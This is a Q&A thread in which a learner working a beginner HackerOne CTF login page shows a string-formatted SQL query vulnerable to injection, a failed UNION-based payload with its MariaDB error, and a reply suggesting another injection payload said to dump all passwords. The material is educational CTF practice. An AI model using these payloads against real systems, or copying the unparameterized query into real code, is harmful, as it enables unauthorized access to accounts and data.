MariaDB gives me an error that says 'WHERE '1'='1'' in a ctf

Question

Im going through the beginner hackerone ctfs and Im trying to crack the Micro-CMS v2. There is a login page that is vulnerable to an SQL injection. The query goes like this:

'SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')

In the username field I input ' UNION SELECT '123' AS password WHERE '1'='1 but then it returns this error

ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE '1'='1'' at line 1")

I tried commenting it out with --' or usingg WHERE 1=1' instead but nothing seamed to work

@GordonLinoff: I think they're learning how to exploit the lack of parameters... ;-) — Lukas Eder, May 10 '20 at 07:36

score 0 · Answer 1 · edited Nov 12 '22 at 21:57

0

Maybe try to put UNION' or 1=1; -- in the username field.

So the query would become like this:

SELECT password FROM admins WHERE username='UNION' or 1=1; --

The result of this query would output all values in the password field.

edited Nov 12 '22 at 21:57

Chris Albert

2,462
8
27
31

answered Nov 08 '22 at 17:16

SamGrandpa

1

MariaDB gives me an error that says 'WHERE '1'='1'' in a ctf

1 Answers1